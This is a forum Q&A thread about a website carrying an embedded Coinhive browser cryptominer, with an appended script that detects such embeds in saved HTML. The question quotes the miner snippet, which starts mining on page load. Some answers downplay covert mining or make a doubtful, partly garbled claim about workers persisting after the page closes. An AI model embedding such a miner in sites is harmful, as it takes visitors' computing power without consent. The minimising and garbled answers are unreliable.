Website with miner script

I found that some of my users visit a site that apparently has a bitcoin JS script in its code:

    <script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script>
    <script>
      var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
      miner.start();
    </script>

My question is: are users still infected with this, even if they move away from the page? Are these programs used only if the user has the page open in the browser?

+8
javascript web malware
3 answers

are users still infected with this, even if they move away from the page?

No.

Are these programs used only if the user has the page open in the browser?

Yes, the script will only run on the website that includes it, and only while the page is open in the browser.

UPDATE:

Additional information about this script: https://coin-hive.com/

Coinhive offers a JavaScript miner for the Monero Blockchain (...) that you can embed on your site. Your users launch the miner directly in their browser

And https://coin-hive.com/documentation/miner

The miner works until you explicitly stop it again or the user moves forward.

+9

Coinhive is not "malware" because it does not seem to do anything particularly dangerous to the user's computer. If so, users' computers were never “infected” with anything.

These days, it is extremely common for websites to download tons of third-party scripts and cookies in the background and do hundreds of things that you don’t know about every time you use the Internet. Most sites download a Google Analytics tracking script when you visit them, even if you did not allow them to do so. But this will not be considered malware. Most sites download persistent third-party cookies that track your presence from one site to another and create a massive profile of your online habits. That's why you can go shopping for shoes on one site, and then suddenly discover that Facebook serves you advertising for them. But it is also usually not considered malware.

In terms of “harm” or “unwanted activity”, ongoing monitoring can be considered more invasive than developing a coin script. Perhaps using a coin script just uses some memory and end-user processor power, which is no different from hundreds of other javascript libraries that load in the background without your knowledge.

+5

I am not familiar with the coin-hive service, but actually the script you provided contains the following lines:

  var JobThread = function() {
    this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);
    this.worker.onmessage = this.onReady.bind(this);
    ...
  };

As you can see, this uses Workers. I have not studied the entire script, but in any case, the use of web workers means that some operations can be performed even after the page is closed. Additional information in this post.

So, the very first answer to your question: YES, users can be infected for some time after closing the page (theoretically, if the script is written this way).

But in fact, the script appears very soon by the system itself. Also, the coin-hive platform is not positioned as malware and should be safe for users. I don’t think you should worry about this.

+3
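
For an administrator who wants to find pages carrying the embed quoted in the question, saved page source can be checked for it. The following is an added example, not part of the original thread and not Coinhive's code; findMinerEmbeds, refang, MINER_HOSTS and the sample page are names constructed here, and the host list holds only the host shown in the question.

```javascript
// Added example (not Coinhive's or the thread's code): flag miner embeds in saved HTML.
// The host and the CoinHive.* names come from the snippet in the question.
const MINER_HOSTS = ['coin-hive.com'];

// Undo defanging ("hxxps://", "[.]") so quoted samples still match.
function refang(text) {
  return text.replace(/hxxp(s?):\/\//gi, 'http$1://').replace(/\[\.\]/g, '.');
}

function findMinerEmbeds(html) {
  const page = refang(html);
  const findings = [];

  // 1. <script src=...> served from a listed host or one of its subdomains.
  //    Compare parsed hostnames, not substrings, to avoid look-alike matches.
  for (const m of page.matchAll(/<script\b[^>]*?\bsrc\s*=\s*(["'])(.*?)\1/gi)) {
    let host;
    try {
      host = new URL(m[2], 'https://relative.invalid/').hostname;
    } catch {
      continue; // unparseable src attribute
    }
    if (MINER_HOSTS.some((h) => host === h || host.endsWith('.' + h))) {
      findings.push({ type: 'script-src', host, url: m[2] });
    }
  }

  // 2. Inline "x = new CoinHive.<Ctor>('<siteKey>')", plus whether x.start()
  //    is called, i.e. mining begins as soon as the page loads.
  const init = /(?:(\w+)\s*=\s*)?new\s+CoinHive\.(\w+)\s*\(\s*(["'])([^"']+)\3/g;
  for (const m of page.matchAll(init)) {
    const startsOnLoad =
      m[1] !== undefined && new RegExp('\\b' + m[1] + '\\.start\\s*\\(').test(page);
    findings.push({ type: 'miner-init', ctor: m[2], siteKey: m[4], startsOnLoad });
  }
  return findings;
}

// Constructed sample: the question's snippet plus two benign look-alike tags.
const SAMPLE_PAGE = `
<script src="https://example.org/js/coinhive-news.js"></script>
<script src="https://coin-hive.com.example.org/lib/app.js"></script>
<script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script>
<script> var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f'); miner.start(); </script>`;

console.log(findMinerEmbeds(SAMPLE_PAGE));
```

The two look-alike tags in the sample are not reported because the check compares the parsed hostname, so a file name or a longer domain that merely contains the miner host does not match.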